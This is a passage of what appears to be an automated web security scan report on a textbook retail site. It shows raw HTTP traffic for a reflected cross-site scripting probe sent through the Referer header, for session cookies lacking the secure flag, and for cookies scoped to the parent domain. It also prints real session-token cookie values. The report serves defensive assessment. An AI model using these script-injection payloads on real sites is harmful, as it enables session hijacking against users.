Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;
Referer: http://www.google.com/search?hl=en&q=5d67a'><script>alert(1)</script>0e18f25531c

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Type: text/html
Date: Sun, 26 Dec 2010 13:53:41 GMT
Content-Length: 25072
Connection: close
Set-Cookie: TBSESSION=PS%2B8EOnU68uVZdU0tH08YenwbsgLh%2BEvnBQ601Ri2xf%2Fwaylmd%2FTySncVPwJoaJblx2MlTAkkCk5HaUKjs9MMLcUbN18wkAhyA2LJ9mnnm1xev%2BXLjEkxE8XYcWScrdB%2FYM%2BcErvBVt1I4yULdpLnUCRxmCNQQrwPPJ3FhQnjFHENSHsNWjhRJd8fvwhnnNmjUDRK4pWyX3aEuVBCpOqwbdyAt6twBiCAkdRQcrkzbS7cB1tbuezJcX7DmySf5zMoGOH6ol2ZbG%2FlhTM%2FyScIi0Xa%2B759fzN9aXmU%2FVKZvDRhYjZlcIUoixhVEtbb%2B9INvHYoGUNzj5IZCugziwl8%2BgSsuAm6rFDO4N5zq05GsbbPBAljtc%2Brl%2BbFyacu7Etdu5ZNJoNbifd8yr%2BlzFZ3shsMonFogv3uk%2BvtXOCo7HAD2p0c%2BMG6cnWCc1wD8BEiqsKTCASuf9ZFwSh3CZHHe6Y%2F33h764DovoQZO9NnkbPjOBxNxlTNf6fic3YLCVS5aKYAg8lssbk2k9wnI4xLhzHZvqikXiOwSFFFq7ucQdue6CN28iOvgwTS70AQ%2BZCFkwh7wbghTqQrPB%2Bdu7lVHRxCmg1oF7s52Ko%2BdbAm%2BITqXUDFYmmWb%2FBge7caH%2B%2BKfv4fz%2B14zRrIzCGaXRK3iVeSsE1cbA25WSbX1evxGxC7aaDSuXI5N66bvhUStFLIGrgCg22C67VY1YhLP%2BzqqkqVvTDITvngkrt3Wg45ghZbkrLWKKZnuOJ5y5nx9XOXRc5HcGf36X%2FZFDqoK1YvGJ1zhBQ6Fz5pS0%2BADjmR4ITtJS4bRL8zUX9%2FK8DUemvvUZTyxCtqrcp7uaPOwvXS2J7MZmSc9vr3%2B22Tp%2B2ORewVjHxkbakF6S2gs62HdmQtguWoJlzWJNhum3igQeBP1%2FRauUt1AK0i%2FHhdiDSMWRm1bRkBPzQIaYOlukum1pMdwR8ZIiy7tsZfoK01HV8j7Pofth9rul5DF89g5Y%2F5%2FWdrlPl%2FU90YXlX64u%2F4%2BDoRO%2B%2FbZemrSZUhgQW0bXOq7qbgG1g%2BuZAoCJe%2BqfsC29Vfb8ZrTMqqN1LbR9XJU2f0ktFOSmNG%2BESkHGwRzVoTzQknkUQPh8ohWPfr%2BXS1pJY2%2B0pNV%2Baw88KyHFqhjw3kmW8HyCqNVs6UfcebYU8iOKXuxwGpyNKO8VJy1mO8CHrDIZrnj6jPa%2BoBX9E8l67RO5cPoMK8VSUEv6gxg6wGxKfpOUX4NaPQavaIo8IZwobKz739fdnZKXTfTs%3D; domain=.textbooks.com
Set-Cookie: TBPERSIST=28G4JbhXcUVVlx3sm7w%3D; expires=Mon, 26-Dec-2011 13:53:41 GMT; path=/; domain=.textbooks.com


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head>
   <meta name="ke
...[SNIP]...
<a href='http://www.google.com/search?hl=en&q=5d67a'><script>alert(1)</script>0e18f25531c'>
...[SNIP]...

2. SSL cookie without secure flag set  previous  next
There are 3 instances of this issue:

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.


2.1. https://www.textbooks.com/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.textbooks.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Type: text/html
Date: Sun, 26 Dec 2010 13:51:33 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: TBSESSION=ZX8GKynTOuWErN2bcxdglGgKUSVXmfokmfizdb6fXTI%2BkR6D8IpmlJEj8xLbFZnS%2BJJGCtOuN%2FOKVTrOLZcOjsEyXvfO3m%2FWjiS3Tov2DxWx9fYSBrvdGp1zFD%2BnDX4xGxk1gggjoyAKhSzCtlGPUE6nWxB1csyqQN49pxfSslBvn6mLxmBpHtLY2qr5rtRu9tnlKVxOXq7%2FlHpIlh5xb4ra9riQLAee%2FazWSBVImIIDygqP7JOCyi6pFbzhv9vg%2FS0Sg3qb1xgVTopYw%2BaVBJ22tR1fBdfZmD7U44lVQInfrgOocBPveCj%2B7GY2C0J8oh%2BZVK9Xt1%2FzOM0DBLjPABq1sI%2BiMRhJJrfgsS3iPVywEwpg%2F78enCbB2lHrUmr%2F7Lw3c5pV7kLIP%2FEEHyAbsSI9qhrUO1aAYrSPF7TcIiKJy0v1aMpBnUxS6NEF1Jdlpe8SXxtioOeQSmm1MeCzJnTK%2BQgoHNyZe4GIRgmzWKiWy4JjMdtuR1KYjgTFXn4l0nrhzC0HPucbs8NP%2FksPlrq%2BEC%2BNotrXpkmBW8G9fryo6eUnfBOJFg6vKHxLPbPuJBECFWXyOdR%2BqXpZdJazoXunYU1UxyscQzPrneA5uvC%2FxLBEn2QwJJGlXdmVR1Q5cA7tNdCc%2Bcu1Me0cycGyudiSiiyCJEwVsXhU3jxSS7r%2B6zpbwHKFwdEUEZcoNJvwZuinnH020ZwqBqODaagXOsOoW9JBCcUrqSx7ZiFrd7O8xoDt7aBSXwyk7AcvSw%2BEZUJN3Vku51lf2Pv%2Fa7MKxWN4sYPWZbBw5KF4soeZ0%2Fvnq2lMMJYoGjUjvd%2BaDZeJSpTafw3qbOe%2FvQiTCkxkEySfXUllj8UI2b82MFZBC6nPV3te%2BOzRsT7D3bgZ3JULOFVZnYK3NNfmkQvW7w7PWd%2FcaqffTehBhIMhdPQcED7H7X5RO7M84QxIn0rnhyNsDWFMmJ1433jiBv4H71uqgQfEBtmMqu9dMOyXG4SkVJoia5HgtyWaejvNKkYBhsqc0DnJ0XPJ8GvSlToFgL3O2iMRulEwx%2FxUuCi0oX0gyMm%2FdUj4ASoSPZcLR7MGHdnmpCHYuxrIEcxmin75yo13LkVZCbZyNWHUWG6NBN15WVJgJ3COQlGxX8lBuInrftfMkqy4tGZ%2BHBZRrFGTm8ULKVJXPjqLOCqcc1gk3hk1KgDCsZEe4XIyBnLVY6zU62RlabQRw8iypVhzrzZDdHBPOTcaAuNXPPnO3Zj13u7ZCzzXPk1ipoRZtpBeOPU%3D; domain=.textbooks.com
Set-Cookie: TBPERSIST=b%2Bc21UkT1sQaFcBDQHk%3D; expires=Mon, 26-Dec-2011 13:51:33 GMT; path=/; domain=.textbooks.com
Content-Length: 35362


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <meta name="keyw
...[SNIP]...

2.2. https://www.textbooks.com/account.php  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.textbooks.com
Path:   /account.php

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /account.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Type: text/html
Date: Sun, 26 Dec 2010 13:53:28 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: BBVC=deleted; expires=Sat, 26-Dec-2009 13:53:27 GMT
Set-Cookie: TBSESSION=HcVwmiPPLgvSivqJfoVmbt5gEZEgOp9Y6lox26AAXxDEjyif4Rkxly04sOZvg82jolcnT4y6M%2BzialsUEUiwtzC0zrDbjKsCRQsp6nd0%2BYtymVfLwc1Yl1g5o907kAXdJIgxb0amVLjTSzKlHgNQRwbvpNwW76WEWfJgBamgPBB1CyWrWBKzeeKIhhY343NcQGrHiNaXnjrKVHVu%2Bo1FGhpfdJaYnCAfOIJQWUtjeAhtQIj4quQwNpSvMYD1b8TmjOhnYOWRnvTXeqm5NHUK7qQq%2FjkS5iz60x3gyYSEBVIhshq7j7g4YM0YXpFUYZDYHOEpSIGyenfLHHsn02GIkFloCqa4AuzSEi8ZsCHgjI8mVN45YshZiUjIF7tAwShLwqZZ10UTxjftbLiTqUtgMOcN67A07SzT%2Bm0CKRleBxf9wiQQ%2FvyPtCYTJvei%2B5mqLbm991T4AxxBpJaEI%2BUgDwazAslsjkY4JIUy7YLGVJwu%2FBujjdU%2FTicgb%2Ff1z50%2Bpdn%2BLvuTlVyZfbbcaO6yutU55v6C1IJgRNCR%2FPIT0AqXdLBtKmafMSR%2BWspB3f1XB%2BauptSiRiRi93k1tJ2TwXiBPYKI%2BRJiptUrodZoDdGPwSkW63j4HAsLMpEEwfVov%2FvhWHHnjXic9UZVVGm7ulnspI3MlyxiuyEkDmJ1H8fhwSKQmtApkbumDH3pkz2D7kQSsglPowig%2FdlGUHoKTCNU573VqDUMoTeMAR7XhCZ6v4S4ViJnwVtKsv38xYZRzTijBe7xXX%2F4N0dVw7HgjK2xAYd2fNmOqn%2BX8H9BXQATUukdlq35nT%2FxoAVQqKcq046rXaTIcEraJgyGeFWZjugdBW%2BRPcqdZCrFw04L6LLv6r9TYvHwV%2Fg%2BlPBxSUjhQ1Wxu89rfRkRYFK036RbCcN%2B%2BDhOv%2Bnrvq6Lj2%2F8kO1AuI%2BMXWikfGbD4%2B03CwVPLlEHLKQI4cXZ9slTe%2Fzqvbh9Gd1Qurod%2FlXpNHZbgZ2U%2BM0pEnAmLIL93PWUT4ArNJHraqKPWK31tkUf1%2FDNmOW8xoEmwRBTC5GWmn9uiQVx5CT4QM8ecUE8hSiWxuveHAUMCzEDL9S7n6OlrWM856CqXGQKpQfittBjcx4mixKTRRV4yO8aLteM3jw3BpT45djSHDbibcFUVoM8ZzdrStw9PbT2JLjG6PlxHnjuXl7mNADGH6oIrppH1mDuh%2Bi0xp0uRXcgEgYyUFcHHmQlYllBMMLpj7A0AzPTtuvk7mCLB3xCiydJVPQZPGk%3D; domain=.textbooks.com
Set-Cookie: TBPERSIST=m2sT%2BeW4bxWwrRneS60%3D; expires=Mon, 26-Dec-2011 13:53:28 GMT; path=/; domain=.textbooks.com
Content-Length: 33655


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <meta name="keyw
...[SNIP]...

2.3. https://www.textbooks.com/checkout.php  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.textbooks.com
Path:   /checkout.php

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /checkout.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Type: text/html
Date: Sun, 26 Dec 2010 13:53:30 GMT
Content-Length: 24992
Connection: close
Set-Cookie: TBSESSION=GN%2Bu2RH0zu72InyE7yjEtHseOWko2s6C3Nnu%2Bel02ruAFXvxPxqzfstCuA9ufemgaVoW15o7ehfaiR3lXYev5Hl28gWQjGdp4r62cntl8Ppe%2BQB%2B%2F0PnTWSxzxnfeNqCXausL%2FDZQfxUHbZa9YobNMc8nhhywgxyfre46xwN%2FdJR8Nt8THau6QM%2FBcr5%2F541p6%2BsumwfXZERaEEcWeO7wcXn17Rv8%2FpFFZGks%2BIFbkjavKs9dmHpL7BrI2pt6sPQHd6b%2F2deduiP0eCPe1QyoIAGILwFRS1VriIsFzQzNIade%2BzmnH7SXXYtPwyEg9JZ4dcMkuab51A0Rbyy9BeTp%2FoQEc1rmertrtbWBb43SpmFMl1pXIEcwpTMwaOPsLcgAzKdCVWtHQM2y74Ilusj5dymYdWvCF0AFv72joZNh9xAOIj00moAbgiQvYm3YjgRybXPW9WGZyM%2BgfKSvc5swAJwYxW37jqjz99uCNVTm3zBmW39bUFF2gxAf3vZvMdxtqk5ozLzxiVXd0bxt4anKXczZx9bhqV9FBaehw5XylsCdUi3r%2Bvq1zaC5pHseIvr9%2BPEglegFQ%2B%2FcB%2Fdj5fO8ARg4iNt6%2FaYMgig5ah41Qu95hVCN7SsCNUFXdOlTgBfeobXgKKT0iSxNsimPxBfoTfpzMy%2Fby4BPcBbdT%2FfI1N3RhYOJLeAdCeujM8Zf2kK%2BQt5gzaEz7H0ARx%2FooJKRBqTMkKWw1Bbiu2usiUDsWDbH7mBiYYr5JoOUqU%2BgmlbkpdpH3IwQHihGE41zVNOEH44siHFWYUggG3CvTI3fDrDddZZgwv%2BaAdExM3QJScmaz2VVVGi7%2FXqU9OnyHVOusBLag9o5vRGT8SpjfoBv00CAehyb%2FnlDPlfmTR2ub2vbwjSxDFRz60oue41qDXfDZGyy8izPa293C2Uw98B2R7%2BxtYJBj895DBpW16w4bActPCnt2Fsxga7UPsKbwH5T5WruVPnmFOBV5GdnvIYNip%2Bt7kJhz1cg1pPGwRsVDHx5f4MMG70GQNe2HZGXDcb%2BPjlKHpSRYceIYzY1DbVka1dTaJ5HB7biPNlqni%2FRLgbvpxRYK4c4cUuwZw90NqaYAYBCZ2hXQBVYl%2FCi4xZnnjYBdK06nekOvzbvYBHOYXbbtnd4A1P0kMPaIJJEhLoeQBCR%2Bzb0%2Bs1d2Amp0nBVVDBvJEwSH6AeHJ2wNFvE%2BK9jjxqBBs0wqkLl%2F0OccXwsuWFBpSUUPPdJ4qm4Y8r%2FMp7FUkd6mjJblkV4kY%3D; domain=.textbooks.com
Set-Cookie: TBPERSIST=9vc8KFkiyfVkIilGB6Y%3D; expires=Mon, 26-Dec-2011 13:53:30 GMT; path=/; domain=.textbooks.com


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head>
   <meta name="ke
...[SNIP]...

3. Cookie scoped to parent domain  previous  next
There are 29 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.


3.1. http://www.textbooks.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
